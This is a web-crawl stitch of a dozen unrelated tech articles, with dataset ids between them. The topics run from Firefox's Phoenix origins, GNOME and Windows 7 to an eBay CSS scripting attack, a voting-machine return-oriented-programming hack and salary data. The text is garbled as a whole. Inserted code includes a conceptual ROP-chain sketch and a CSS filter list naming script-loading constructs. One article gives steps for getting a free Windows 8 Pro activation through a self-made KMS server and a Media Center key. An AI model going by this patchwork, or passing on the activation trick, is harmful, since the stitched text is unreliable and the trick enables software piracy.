3. Phoenix aims to provide a "layered" approach to building a web browser. In other words, allowing mozilla.org to ship a simple stable base with core functionality, and provide a means for managing extensions and layering in add-ons, so that a user could build up the browser to be as complex as he or she wants. This allows some users to have the range of features found in today's Mozilla releases (or even more) while also providing a convenient path for those who want a lean, quick, simple browser.

4. It has been proposed by a group of XUL experts who have been leaders in the development of Mozilla's browser application, and whose creativity we want to encourage.
To do this, we’ve created a separate browser partition in our CVS tree. This will allow the cohort of hackers who proposed this project some room to experiment without affecting either the seamonkey branch or trunk. This is a restricted partition, meaning that it is open only to its designated owners and peers. In other words, CVS write access to the seamonkey tree does not include checkin access to this partition.
Development of the browser application and suite in the CVS tree will not be affected at all. Review, super-review, check-in access, involvement of drivers and other mozilla.org policies will continue without change.
dboswell
wrote on May 14, 2013 at 4:15 pm:
There is more background on the name changes with Phoenix on the Mozilla Firefox – Brand Name FAQ at:
http://www-archive.mozilla.org/projects/firefox/firefox-name-faq.html
In addition to Phoenix and Camino, there were a number of other efforts going on around this time to experiment with different approaches to creating browsers based on Mozilla code. Other browser efforts include Galeon, K-Meleon, SkipStone, Q.Bati, Beonex Communicator and Aphrodite.
I think there was a sense that if ‘one hundred browsers bloomed’ then the best of those experiments could help shape the direction of development and some of these other browser efforts did help inform decisions made with Phoenix.
There’s an article with more information about several of these different browsers at
http://www.oreillynet.com/mozilla/2002/09/12/mozilla_browsers.html
About dboswell
David has been involved with Mozilla for over twelve years and serves as a Tour Guide of the community to help people get involved and find the things they are interested in.
What Is the GNOME Desktop
by Aaron Weber, coauthor of Linux in a Nutshell, 5th Edition
The GNOME desktop is a free, user-friendly desktop environment for Unix and Linux operating systems. It also provides a platform for development of new applications. The latest version, GNOME 2.10, is available for Linux, Solaris, HP-UX, BSD, and Darwin platforms. If you want to try it out, you can download a no-install-necessary LiveCD at torrent.gnome.org, 100 percent free, of course.
This article discusses the following:
The GNOME Desktop and Applications
The GNOME Development Platform
GNOME is a desktop software project, but it's large enough to mean different things to different people. If you're a software user, it's a desktop and some applications. If you're a software developer, it's a platform, toolkit, and community. The core applications consist of the Nautilus file manager, the panel and its associated gadgets called panel applets, the usual complement of accessories (text editor, terminal emulator, calculator, and so on), a few games, and some larger applications like the Evolution mail, calendar, and address book, the Gnucash finance tool, the Rhythmbox music player, and the Totem video player. The development platform consists of a set of libraries and language wrappers that range from the low-level (the glib utility functions and the libxml XML parsing libraries) to buttons and widgets as complex as a Mozilla-based HTML rendering tool--meaning you can write your own web browser in under 100 lines of C#, or a calculator in about 5 lines of Python. The libraries are accompanied by user interface guidelines and application interaction standards, so that developers can do things like insert icons into menus automatically, use the system tray for user notification of background tasks, and even manipulate calendars and other data stores created by other applications. For example, OpenOffice.org can reach out to the Evolution address book for mail-merge data, and the panel clock can show upcoming appointments listed in the Evolution calendar.
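As a rough illustration of the "calculator in about 5 lines of Python" claim, a sketch along these lines would have used the PyGTK 2.x bindings of that era (the module and method names below assume PyGTK; modern GNOME uses PyGObject instead, and the eval-based arithmetic is a toy shortcut rather than production code):

```python
import gtk  # PyGTK 2.x bindings, as shipped alongside GNOME 2.x

window = gtk.Window()
window.set_title("Tiny calculator")
entry = gtk.Entry()
# Pressing Enter evaluates the typed expression and shows the result in place.
entry.connect("activate", lambda widget: widget.set_text(str(eval(widget.get_text()))))
window.add(entry)
window.connect("destroy", gtk.main_quit)
window.show_all()
gtk.main()
```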
The whole effort is coordinated by a nonprofit group known as the GNOME Foundation. The Foundation determines release schedules, chooses standards, and handles the administration of the websites and network services. It also determines what software officially "counts" as part of GNOME. Applications included in GNOME must have free licenses and a basis in GNOME technology, must comply with user interface guidelines, and be generally useful and good--for example, no spam tools are allowed. To make it into an official release, an application must be fully documented, debugged, and packaged before the shipment deadline. Libraries have earlier deadlines, so that they can be part of the development platform. Once part of the platform, libraries must maintain API and binary compatibility for long periods of time after release, so that more applications can be built on top of them. The official set of GNOME applications and libraries is listed at www.gnome.org.
Linux in a Nutshell
By Ellen Siever, Aaron Weber, Stephen Figgins, | 计算机 |
First look at Windows 7's User Interface
Microsoft has given us a first glimpse at Windows 7. The taskbar has changed …
At PDC today, Microsoft gave the first public demonstration of Windows 7. Until now, the company has been uncharacteristically secretive about its new OS; over the past few months, Microsoft has let on that the taskbar will undergo a number of changes, and that many bundled applications would be unbundled and shipped with Windows Live instead. There have also been occasional screenshots of some of the new applets like Calculator and Paint. Now that the covers are finally off, the scale of the new OS becomes clear. The user interface has undergone the most radical overhaul and update since the introduction of Windows 95 thirteen years ago.

First, however, it's important to note what Windows 7 isn't. Windows 7 will not contain anything like the kind of far-reaching architectural modifications that Microsoft made with Windows Vista. Vista brought a new display layer and vastly improved security, but that came at a cost: a significant number of (badly-written) applications had difficulty running on Vista. Applications expecting to run with Administrator access were still widespread when Vista was released, and though many software vendors do a great job, there are still those that haven't updated or fixed their software. Similarly, at its launch many hardware vendors did not have drivers that worked with the new sound or video subsystems, leaving many users frustrated.

While Windows 7 doesn't undo these architectural changes—they were essential for the long-term health of the platform—it equally hasn't made any more. Any hardware or software that works with Windows Vista should also work correctly with Windows 7, so unlike the transition from XP to Vista, the transition from Vista to 7 won't show any regressions; nothing that used to work will stop working.

So, rather than low-level, largely invisible system changes, the work on Windows 7 has focused much more on the user experience. The way people use computers is changing; for example, it's increasingly the case that new PCs are bought to augment existing home machines rather than replace them, so there are more home networks and shared devices. Business users are switching to laptops, with the result that people expect to seamlessly use their (Domain-joined) office PC on their home network.

As well as these broader industry trends, Microsoft also has extensive data on how people use its software. Through the Customer Experience Improvement Program (CEIP), an optional, off-by-default feature of many Microsoft programs, the company has learned a great deal about the things that users do. For example, from CEIP data Microsoft knows that 70% of users have between 5 and 15 windows open at any one time, and that most of the time they only actively use one or two of those windows. With this kind of data, Microsoft has streamlined and refined the user experience.

The biggest visible result of all this is the taskbar. The taskbar in Windows 7 is worlds apart from the taskbar we've known and loved ever since the days of Chicago. Text descriptions on the buttons are gone, in favor of big icons. The icons can—finally—be rearranged; no longer will restarting an application put all your taskbar icons in the wrong order. The navigation between windows is now two-level; mousing over an icon shows a set of window thumbnails, and clicking the thumbnail switches windows. Right clicking the icons shows a new UI device that Microsoft calls "Jump Lists." They're also found on the Start Menu:

Jump lists provide quick access to application features.

Applications that use the system API for their Most Recently Used list (the list of recently-used filenames that many apps have in their File menus) will automatically acquire a Jump List containing their most recently used files. There's also an API to allow applications to add custom entries; Media Player, for example, includes special options to control playback. This automatic support for new features is a result of deliberate effort on Microsoft's part. The company wants existing applications to benefit from as many of the 7 features as they can without any developer effort. New applications can extend this automatic support through new APIs to further enrich the user experience.

The taskbar thumbnails are another example of this approach. All applications get thumbnails, but applications with explicit support for 7 will be able to add thumbnails on a finer-grained basis. IE8, for instance, has a thumbnail per tab (rather than per window).

Window management has also undergone changes. In recognition of the fact that people tend only to use one or two windows concurrently, 7 makes organizing windows quicker and easier. Dragging a window to the top of the screen maximizes it automatically; dragging it off the top of the screen restores it. Dragging a window to the left or right edge of the screen resizes the window so that it takes 50% of the screen. With this, a pair of windows can be quickly docked to each screen edge to facilitate interaction between them.

Another common task that 7 improves is "peeking" at windows; switching to a window briefly just to read something within the window but not actually interact with the window. To make this easier, scrubbing the mouse over the taskbar thumbnails will turn every window except the one being pointed at into a glass outline; moving the mouse away will reinstate all the glass windows. As well as being used for peeking at windows, you can also peek at the desktop:

Peeking at the desktop is particularly significant, because the desktop is now where gadgets live. Because people are increasingly using laptops, taking up a big chunk of space for the sidebar isn't really viable; Microsoft has responded by scrapping the sidebar and putting the gadgets onto the desktop itself. Gadgets are supposed to provide at-a-glance information; peeking at the desktop, therefore, becomes essential for using gadgets.

The taskbar's system tray has also been improved. A common complaint about the tray is that it fills with useless icons and annoying notifications. With 7, the tray is now owned entirely by the user. By default, new tray icons are hidden and invisible; the icons are only displayed if explicitly enabled. The icons themselves have also been streamlined to make common tasks (such as switching wireless networks) easier and faster.

The other significant part of the Windows UI is Explorer. Windows 7 introduces a new concept named Libraries. Libraries provide a view onto arbitrary parts of the filesystem with organization optimized for different kinds of files. In use, Libraries feel like a kind of WinFS-lite; they don't have the complex database system underneath, but they do retain the idea of a custom view of your files that's independent of where the files are.

These UI changes represent a brave move by the company. The new UI takes the concepts that Windows users have been using for the last 13 years and extends them in new and exciting ways. Windows 7 may not change much under the hood, but the extent of these interface changes makes it clear that this is very much a major release.
09 March 2009, 12:22
Swindlers using new CSS method attack eBay
Swindlers have apparently managed to manipulate descriptions of goods on eBay so that they can change or overwrite any item numbers and the advertiser's email address. This hasn't just misled bidders: it's thought that eBay's measures to protect against fraudulent auctions have been outsmarted.
The swindlers use a cross-site scripting attack in conjunction with the XML Binding Language (XBL), which allows elements in an HTML document containing scripts, style sheets and other objects to be linked to another web site. However, precisely where the error lies is still unknown.
Although the developer Cefn Hoile has sparked off a discussion in the Firefox bug database about a vulnerability in the browser, an attacker would get nowhere without the ability to link his own code to eBay. It is possible to reload cascading style sheets (CSS) from other Web sites into an advertiser's own auctions, although it shouldn't really be possible to reload JavaScript. Nevertheless, it's reported to be possible to reload and run prohibited scripts by using a certain function.
eBay now claims to have eliminated the problem on its pages, while Firefox's developers are thinking about developing a patch to contain it. However, they point out that this attack doesn't exploit a vulnerability in the browser, nor, for example, does it violate the same-origin policy. On the contrary, they say, the danger of content being embedded from other pages has been known for years, and eBay simply ought to improve its filtering, or checking, of downloaded content.
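The "improved filtering" the Firefox developers allude to amounts to rejecting or stripping style rules that can pull in active content from elsewhere. A toy server-side check might look like the sketch below; a real sanitiser would parse the markup rather than pattern-match, and the rule list here is only illustrative.

```python
import re

# Style constructs that let seller-supplied markup load active content.
BLOCKED_PATTERNS = [
    re.compile(r"-moz-binding\s*:", re.IGNORECASE),   # XBL bindings in Gecko
    re.compile(r"expression\s*\(", re.IGNORECASE),    # CSS expressions in old IE
    re.compile(r"javascript\s*:", re.IGNORECASE),     # script URLs
    re.compile(r"@import", re.IGNORECASE),            # chaining in further style sheets
]

def listing_is_acceptable(description_html: str) -> bool:
    return not any(p.search(description_html) for p in BLOCKED_PATTERNS)

print(listing_is_acceptable('<p style="color:red">Lovely watch</p>'))                   # True
print(listing_is_acceptable('<p style="-moz-binding:url(http://evil/x.xml#b)">hi</p>'))  # False
```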
Other pages that permit the embedding of code and the reloading of CSS are also affected by the problem. It's claimed that Internet Explorer versions 6 and 7 are vulnerable to such attacks.
System Applications
Revision as of 10:15, 5 June 2012 by Dsr
This is the wiki for discussions on System Applications in support of the proposed System Applications Working Group; see the draft charter and the [email protected] mailing list.
The aim is to define a run-time environment, security model, and associated APIs for building Web applications that integrate with a host operating system. While this run-time will have substantial overlap with the traditional browser-based run-time environment, it will have some important differences, being focused on Web applications that integrate more strongly with the host platform rather than traditional hosted web sites.
As an example, consider an API to enable access to information in your address book, whether this is stored on your device or in the cloud. For a regular web site, the API should give users explicit control over which information is made available to the web site, rather than giving it free access to everything. A system application API by contrast could be used to create and manage your address book. This requires a higher level of trust in the application code since the API would need to provide free access without the user prompts as required to preserve privacy in the weaker API.
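The distinction can be sketched as a small conceptual model (written here as runnable Python purely for illustration; this is not a proposed W3C interface): untrusted web content goes through a user-mediated picker, while a trusted system application gets direct, prompt-free access.

```python
class AddressBook:
    """Conceptual model of the two trust levels described above."""

    def __init__(self, contacts):
        self._contacts = list(contacts)

    def all_contacts(self):
        # Trusted system applications: full access without per-use prompts,
        # suitable for an app that creates and manages the address book itself.
        return self._contacts

    def request_contacts(self, user_picker):
        # Untrusted web content: the user explicitly chooses what to share.
        return [c for c in self._contacts if user_picker(c)]


book = AddressBook([{"name": "Ada"}, {"name": "Grace"}])
print(book.all_contacts())                                  # system application path
print(book.request_contacts(lambda c: c["name"] == "Ada"))  # hosted web content path
```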
Please subscribe to the public mailing list [email protected]. See the link on that page for details. If you have a W3C Account, you will also be able to edit this wiki. To get a W3C account, fill out the account request form.
In case of further questions, please contact the following:
Dave Raggett <[email protected]>
Note: anyone making a substantive contribution to W3C specifications will be required to commit to the requirements of the W3C Patent Policy.
This is a placeholder for adding links to pages describing use cases for system applications APIs.
Computer scientists take over electronic voting machine with new programming technique (w/ Video)
August 10, 2009
UC San Diego computer science Ph.D. student Stephen Checkoway clutches a printout demonstrating that his vote-stealing exploit, which relied on return-oriented programming, successfully took control of the reverse-engineered voting machine. Credit: UC San Diego / Daniel Kane
(PhysOrg.com) -- Computer scientists demonstrated that criminals could hack an electronic voting machine and steal votes using a malicious programming approach that had not been invented when the voting machine was designed. The team of scientists from University of California, San Diego, the University of Michigan, and Princeton University employed “return-oriented programming” to force a Sequoia AVC Advantage electronic voting machine to turn against itself and steal votes.
“Voting machines must remain secure throughout their entire service lifetime, and this study demonstrates how a relatively new programming technique can be used to take control of a voting machine that was designed to resist takeover, but that did not anticipate this new kind of malicious programming,” said Hovav Shacham, a professor of computer science at UC San Diego’s Jacobs School of Engineering and an author on the new study presented on August 10, 2009 at the 2009 Electronic Voting Technology Workshop / Workshop on Trustworthy Elections (EVT/WOTE 2009), the premier academic forum for voting security research. In 2007, Shacham first described return-oriented programming, which is a powerful systems security exploit that generates malicious behavior by combining short snippets of benign code already present in the system.
Computer scientists led by Hovav Shacham, a UC San Diego professor, hacked an electronic voting machine and stole votes using a malicious programming approach that had not been invented when the voting machine was designed. The computer scientists employed "return-oriented programming" to force a Sequoia AVC Advantage electronic voting machine to turn against itself and steal votes. Credit: UC San Diego Jacobs School of Engineering
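Conceptually, a return-oriented attack strings together the addresses of short instruction sequences ("gadgets") that already exist in the machine's own firmware, so no new code is ever injected. The sketch below, written in Python in the style of modern exploit tooling, only illustrates that layout; the addresses and gadget meanings are invented for the example and are not taken from the AVC Advantage.

```python
import struct

# Invented addresses of code snippets that already end in a "return" instruction.
GADGET_LOAD_TALLY   = 0x1A2B   # e.g. load a vote counter into a register, then ret
GADGET_ADJUST_TALLY = 0x2C3D   # e.g. modify the value, then ret
GADGET_STORE_TALLY  = 0x3E4F   # e.g. write it back to memory, then ret

def build_rop_chain(gadget_addresses):
    # Pack the addresses back-to-back as 16-bit little-endian words, the way they
    # would sit on a Z80 stack; each "ret" pops the next address and jumps there.
    return b"".join(struct.pack("<H", addr) for addr in gadget_addresses)

chain = build_rop_chain([GADGET_LOAD_TALLY, GADGET_ADJUST_TALLY, GADGET_STORE_TALLY])
print(chain.hex())
```

Because every byte that executes already lives in the machine's own read-only memory, defenses that merely block injected code do not stop this kind of attack.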
The new study demonstrates that return-oriented programming can be used to execute vote-stealing computations by taking control of a voting machine designed to prevent code injection. Shacham and UC San Diego computer science Ph.D. student Stephen Checkoway collaborated with researchers from Princeton University and the University of Michigan on this project. “With this work, we hope to encourage further public dialog regarding what voting technologies can best ensure secure elections and what stop gap measures should be adopted if less than optimal systems are still in use,” said J. Alex Halderman, an electrical engineering and computer science professor at the University of Michigan. The computer scientists had no access to the machine’s source code—or any other proprietary information—when designing the demonstration attack. By using just the information that would be available to anyone who bought or stole a voting machine, the researchers addressed a common criticism made against voting security researchers: that they enjoy unrealistic access to the systems they study. “Based on our understanding of security and computer technology, it looks like paper-based elections are the way to go. Probably the best approach would involve fast optical scanners reading paper ballots. These kinds of paper-based systems are amenable to statistical audits, which is something the election security research community is shifting to,” said Shacham. “You can actually run a modern and efficient election on paper that does not look like the Florida 2000 Presidential election,” said Shacham. “If you are using electronic voting machines, you need to have a separate paper record at the very least.” Last year, Shacham, Halderman and others authored a paper entitled “You Go to Elections with the Voting System You have: Stop-Gap Mitigations for Deployed Voting Systems” that was presented at the 2008 Electronic Voting Technology Workshop.”
“This research shows that voting machines must be secure even against attacks that were not yet invented when the machines were designed and sold. Preventing not-yet-discovered attacks requires an extraordinary level of security engineering, or the use of safeguards such as voter-verified paper ballots,” said Edward Felten, an author on the new study; Director of the Center for Information Technology Policy; and Professor of Computer Science and Public Affairs at Princeton University. Return-Oriented Programming Demonstrates Voting Machine Vulnerabilities To take over the voting machine, the computer scientists found a flaw in its software that could be exploited with return-oriented programming. But before they could find a flaw in the software, they had to reverse engineer the machine’s software and its hardware—without the benefit of source code. Princeton University computer scientists affiliated with the Center for Information Technology Policy began by reverse engineering the hardware of a decommissioned Sequoia AVC Advantage electronic voting machine, purchased legally through a government auction. J. Alex Halderman—an electrical engineering and computer science professor at the University of Michigan (who recently finished his Ph.D. in computer science at Princeton) and Ariel Feldman—a Princeton University computer science Ph.D. student, reverse-engineered the hardware and documented its behavior. It soon became clear to the researchers that the voting machine had been designed to reject any injected code that might be used to take over the machine. When they learned of Shacham’s return-oriented programming approach, the UC San Diego computer scientists were invited to take over the project. Stephen Checkoway, the computer science Ph.D. student at UC San Diego, did the bulk of the reverse engineering of the voting machine’s software. He deciphered the software by reading the machine’s read-only memory. Simultaneously, Checkoway extended return-oriented programming to the voting machine’s processor architecture, the Z80. Once Checkoway and Shacham found the flaw in the voting machine’s software—a search which took some time—they were ready to use return-oriented programming to expose the machine’s vulnerabilities and steal votes. The computer scientists crafted a demonstration attack using return-oriented programming that successfully took control of the reverse engineered software and hardware and changed vote totals. Next, Shacham and Checkoway flew to Princeton and proved that their demonstration attack worked on the actual voting machine, and not just the simulated version that the computer scientists built. The computer scientists showed that an attacker would need just a few minutes of access to the machine the night before the election in order to take it over and steal votes the following day. The attacker introduces the demonstration attack into the machine through a cartridge with maliciously constructed contents that is inserted into an unused port in the machine. The attacker navigates the machine’s menus to trigger the vulnerability the researchers found. Now, the malicious software controls the machine. The attacker can, at this point, remove the cartridge, turn the machine’s power switch to the “off” position, and leave. Everything appears normal, but the attacker’s software is silently at work. When poll workers enter in the morning, they normally turn this type of voting machine on. 
At this point, the exploit would make the machine appear to turn back on, even though it was never actually turned off. “We overwrote the computer’s memory and state so it does what we want it to do, but if y | 计算机 |
Microsoft loophole mistakenly gives pirates free Windows 8 Pro license keys
Looking for a free copy of Windows 8 Pro? An oversight in Microsoft’s Key Management System – made public by Reddit user noveleven – shows that with just a bit of work, anyone can access a Microsoft-approved product key and activate a free copy of Windows 8 Pro.
The problem is in the Key Management System. Microsoft uses the KMS as part of its Volume Licensing system, which is meant to help corporate IT people remotely activate Windows 8 on a local network. The Achilles’ heel of the setup, according to ExtremeTech, is that you can make your own KMS server, which can be used to partially activate the OS. That approach requires reactivation every 180 days, though, so it’s not a practical system.
However, the Windows 8 website has a section where you can request a Windows 8 Media Center Pack license. Media Center is currently being offered as a free upgrade until Jan. 31, 2013. Supply an email address and you’ll be sent a specific product key from Microsoft. If you have a KMS-activated copy of Windows 8, with or without a legitimate license key, then going to the System screen will display a link that reads “Get more features with a new edition of Windows.” If you enter your Media Center key there, the OS will become fully activated. It’s a little surprising that with Microsoft’s complex KMS, this type of thing could slip through the cracks, allowing people to take advantage of the system. It seems most likely that after the uproar in response to Microsoft’s plans to remove Media Center from Windows 8 Pro, the company may have rushed the free upgrade, resulting in a loss for Microsoft and a gain for anyone who takes the time to acquire a free Windows 8 Pro copy. It’s unclear whether or not there’s a patch for this – other than removing the free Media Center download altogether. Though ending the free Media Center upgrade would be an easy fix, it wouldn’t be a popular choice among customers who just bought a Windows 8 computer and who want the feature. We’ll have to wait and see how the company responds to this latest hit.
TheMan.com Gets Some Questions Answered
TheMan.com has turned the question and answer section, one of the least productive and most overlooked sections of a Web site, into a forum where it can communicate with customers, build a database of e-mail names and provide special offers.

TheMan.com, a retail site for socially active, time-constrained men ages 25 to 44, recently launched its "Man of Style" channel complete with an interactive Q&A section, http://asktheexpert.theman.com/themanofstyle. The section allows consumers to ask experts a variety of questions about dress wear, casual wear and grooming. TheMan's experts quickly respond via e-mail or publish the answers on the site, thus tackling one of the glaring problems with many Q&A sections -- it's difficult to get a decent, timely response to a query.

The site is accomplishing this task using technology provided by Broad Daylight Inc., an application service provider that develops content channels to broadcast intelligent questions and answers on the Web.

Broad Daylight categorizes the questions and sends them to the appropriate expert. In the meantime, the system is collecting data about what consumers are looking for as well as their e-mail addresses. For example, if a consumer asks what width of tie is currently in vogue and then provides his e-mail address, TheMan can follow up with the answer and an offer for the latest line of Ralph Lauren ties.

Hitting consumers who are ripe to buy with the right offer in this manner "is ingenious," said Richard A. Swentek, president of Arlen Communications, a Key Largo, FL, research firm specializing in interactive media. "It's a great mechanism to find out what's in the mind of the consumer and an excellent pre-qualification mechanism to segregate the marketplace for different e-market retailers. In the future you'll find that to be valuable for businesses to survive in e-commerce."

Typically, sites post a frequently asked questions list to deal with consumers' questions in the "least painful way," said Stephen Difranco, vice president of marketing for Broad Daylight, Santa Clara, CA. "Most sites don't realize their Q&A section can be a very effective way to market and promote the personality of the site. This is a chance to grab an e-mail address, answer their question and brand and bond with the visitor."

The direct marketing and targeting applications are plentiful, according to Difranco. "They can send a graphic postcard with contextual merchandising or advertising. They can provide the opportunity to click to other parts of the sites. Or they could also include a send-to-a-friend button, and then it becomes a viral experience."

Broad Daylight plans to include rich media e-mail applications in the future. Consumers will get the answer to their style question and be able to buy a relevant product without leaving their e-mail box.
Programming SQL Server 2005: Extensive Changes Make an Altogether New SQL Server
Sebastopol, CA--With SQL Server 2005, Microsoft has established its dominance of relational database management system software, says author Bill Hamilton. And, indeed, it comes with a long list of changes designed for increased security, scalability, and power, all of which position it as a complete data package. "I believe that SQL Server 2005, the update to SQL Server 2000, is simply the best and easiest-to-use RDBMS available," says Hamilton, adding that this release is sure to increase adoption: "The extensive new features and functionality in this release make it both a compelling upgrade for SQL Server 2000 and a compelling migration for environments where other RDBMSs are deployed."
Used properly, SQL Server 2005 can help organizations of all sizes meet their data challenges head on. The fresh challenge, however, is to master its many new features, because SQL Server 2005 is an altogether different animal than its predecessor. Hamilton's latest book, Programming SQL Server 2005 (O'Reilly, US $49.99) will make the learning curve a little less arduous for those who are ready to learn to put the new SQL Server through its paces.
Programming SQL Server 2005 is designed for users of all levels; the book requires no previous experience with SQL Server 2000, since SQL Server 2005 differs immensely from its predecessor. The book is an ideal primer for developers with little or no SQL Server experience, and a perfect tool to help seasoned SQL Server developers ramp up to SQL Server 2005 programming models. One of the book's more important features is its in-depth coverage of new programming features for the RDBMS. Topics include: | 计算机 |
Computer Technical Support Specialist
The average Computer Technical Support Specialist in the United States can expect to rake in roughly $48K per year. In the world of Computer Technical Support Specialists, total cash compensation can vary between $30K and $65K. Each package generally includes bonuses and profit sharing proceeds, and in exceptional cases, those amounts can reach heights of $5K and $4K, respectively. Residence and tenure each impact pay for this group, with the former having the largest influence. Work is enjoyable for Computer Technical Support Specialists, who typically claim high levels of job satisfaction. The vast majority of Computer Technical Support Specialists (81 percent) survey respondents are men. Medical benefits are awarded to a large number, and a fair number earn dental coverage. The figures in this overview were provided by individuals who took PayScale's salary questionnaire.
Network Management / Administration
Computer / Network Support Technician
Computer Repair Technician
Help Desk Specialist
Information Technology (IT) Consultant
Support Technician, Information Technology (IT)
Profit Sharing: $290.87 - $3,987
Job Description for Computer Technical Support Specialist
A computer technical support specialist is an employee who diagnoses and troubleshoots hardware and software problems for other employees or consumers. Almost any midsized company that relies on computers will typically require tech support specialists to assist employees who operate them, so that business operations maintain peak efficiency. Companies that manufacture or sell software, computers, and/or components will also have technical support specialists. These specialists help customers with installing and operating their computers and software.
Many technical support specialists will work as part of an information technology or information services department in a larger company or organization. These business entities typically may have anywhere from dozens to thousands of employee users handling a variety of functions through computer technology. In this career path, the technical support specialist will typically be required to log tech support calls from employees. He or she will then work with them through a variety of step-by-step procedures to attempt to solve difficulties. If the tech support person is in the same building or campus as the employee, the specialist can make an onsite visit and work to diagnose and repair or replace hardware and software as needed.
To work as a computer technical support specialist, a person must typically have a strong educational background in the IT field. While a degree may not be required by some employers, most job candidates will find that the certifications in various computer disciplines do require at least some post-secondary training at a technical school or community college.
Computer Technical Support Specialist Tasks
Troubleshoot all information technology issues, including software, hardware, and networking.
Install and update desktops, laptops, PDAs, peripherals, networks, and related software.
Though some Computer Technical Support Specialists move into positions like Information Technology Project Manager (where the average salary is $86K), this progression is not the norm. Career advancement for the typical Computer Technical Support Specialist often leads to becoming a Network System Administrator or a Systems Administrator; median salaries in these positions are $7K higher and $11K higher, respectively.
Survey results imply that Computer Technical Support Specialists deploy a deep pool of skills on the job. Most notably, skills in Cisco Networking, Network Management / Administration, Microsoft Exchange, and Windows NT / 2000 / XP Networking are correlated to pay that is above average, with boosts between 4 percent and 12 percent. At the other end of the pay range are skills like HTML, Linux, and Microsoft Word. For most people, competency in Microsoft Office indicates knowledge of Windows NT / 2000 / XP Networking and Computer Hardware Technician.
Computer Technical Support Specialists with more experience do not necessarily bring home bigger paychecks. In fact, experience in this field tends to impact compensation minimally. The median compensation for relatively untried workers is $39K; in the five-to-10 year group, it's higher at around $45K. After working for 10 to 20 years, Computer Technical Support Specialists make a median salary of $49K. Veterans who have worked for more than two decades do tend to make the most in the end; the median pay for this group is $57K.
For Computer Technical Support Specialists, San Francisco provides a pay rate that is 40 percent greater than the national average. Computer Technical Support Specialists will also find cushy salaries in San Diego (+23 percent), New York (+19 percent), Dallas (+13 percent), and Houston (+9 percent). Those in the field find the lowest salaries in San Antonio, 16 percent below the national average. Not at the bottom but still paying below the median are employers in Seattle and Los Angeles (2 percent lower and 1 percent lower, respectively).
Windows NT / 2000 / XP Networking
Computer Hardware Technician
Internet Information Server (IIS)
(Redirected from Symmetric key)
Symmetric-key algorithms[1] are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link.[2] This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encryption.[3]
1 Types of symmetric-key algorithms
2 Implementations
3 Cryptographic primitives based on symmetric ciphers
4 Construction of symmetric ciphers
5 Security of symmetric ciphers
6 Key generation
Types of symmetric-key algorithms[edit]
Symmetric-key encryption can use either stream ciphers or block ciphers.[4]
Stream ciphers encrypt the digits (typically bytes) of a message one at a time.
Block ciphers take a number of bits and encrypt them as a single unit, padding the plaintext so that it is a multiple of the block size. Blocks of 64 bits have been commonly used. The Advanced Encryption Standard (AES) algorithm approved by NIST in December 2001 uses 128-bit blocks.
Implementations[edit]
Examples of popular symmetric algorithms include Twofish, Serpent, AES (Rijndael), Blowfish, CAST5, RC4, 3DES, Skipjack, Safer+/++ (Bluetooth), and IDEA.[citation needed]
Cryptographic primitives based on symmetric ciphers[edit]
Symmetric ciphers are commonly used to achieve other cryptographic primitives than just encryption.[citation needed]
Encrypting a message does not guarantee that this message is not changed while encrypted. Hence often a message authentication code is added to a ciphertext to ensure that changes to the ciphertext will be noted by the receiver. Message authentication codes can be constructed from symmetric ciphers (e.g. CBC-MAC).[citation needed]
However, symmetric ciphers cannot be used for non-repudiation purposes except by involving additional parties. See the ISO/IEC 13888-2 standard.[citation needed]
Another application is to build hash functions from block ciphers. See one-way compression function for descriptions of several such methods.[citation needed]
Construction of symmetric ciphers[edit]
Main article: Feistel cipher
Many modern block ciphers are based on a construction proposed by Horst Feistel. Feistel's construction makes it possible to build invertible functions from other functions that are themselves not invertible.[citation needed]
Security of symmetric ciphers[edit]
Symmetric ciphers have historically been susceptible to known-plaintext attacks, chosen-plaintext attacks, differential cryptanalysis and linear cryptanalysis. Careful construction of the functions for each round can greatly reduce the chances of a successful attack.[citation needed]
Key generation[edit]
When used with asymmetric ciphers for key transfer, pseudorandom key generators are nearly always used to generate the symmetric cipher session keys. However, lack of randomness in those generators or in their initialization vectors is disastrous and has led to cryptanalytic breaks in the past. Therefore, it is essential that an implementation uses a source of high entropy for its initialization.[5][6][7] | 计算机 |
2015-48/3682/en_head.json.gz/6601 | Posted by TouchArcade Bot, 05-28-2013
Publisher: Chris Yates
Using a combination of real video footage and graphics, Cause & Effect is unlike any game currently available for iPad, immersing you in a story that plays out like a movie.You play Max Alvarez, a perfectly acceptable upstanding citizen who arrives home after a day at work but soon starts to realise that things aren't quite as routine as normal!Cause & Effect offers you different options throughout the story and the decisions you make will influence how the game ultimately plays out.To add further mystery and longevity to the game, Cause & Effect will be offered as a number of chapters similar to TV episodes and will be released as updates at certain timed intervals.The release of the first chapter is completely free of charge so download it now and dive into the world of Cause & Effect.---------------------------------★ Cause & Effect Trivia ★ Cause & Effect has been developed by just one person, this individual has been responsible for everything in the game, including but not limited to, shooting the video, editing the video, creating the graphics and user interface, sound effects and writing the actual code to piece it altogether. Software and hardware used to develop Cause & Effect includes Final Cut Pro X, Garageband on Mac and iPad, Apple Pages, Audacity, MPEG Streamclip, Xcode, Photoshop, Nikon D7000, MacBook Pro, MacBook Air, iPad. Chapter 1 & 2 have over 35,000 lines of code. All locations in the game are real life environments. Cause & Effect started out as an idea in early 2011. All the programming for Cause & Effect was done sitting in front of a MacBook Pro in a living room into the early hours of many, many mornings! | 计算机 |
2015-48/3682/en_head.json.gz/6602 | About Michael J. Miller
Michael J. Miller is chief information officer at Ziff Brothers Investments, a private investment firm.
Miller, who was editor-in-chief of PC Magazine from 1991 to 2005, authors this blog for PC Magazine to share his thoughts on PC-related products. No investment advice is offered in this blog. All duties are disclaimed. Miller works separately for a private investment firm which may at any time invest in companies whose products are discussed in this blog, and no disclosure of securities transactions will be made.
Read full bio »
Is Windows 8 a Replay of the 1980s?
Nov 26, 2012 3:46 PM EST
By Michael J. Miller
Windows 8 has now been out for about a month now and I've been hearing too many comparisons to Windows Vista. Many people considered Vista a failure because corporations largely didn't upgrade to that version and Apple and others made fun of it. (Never mind that it sold hundreds of millions of copies.)
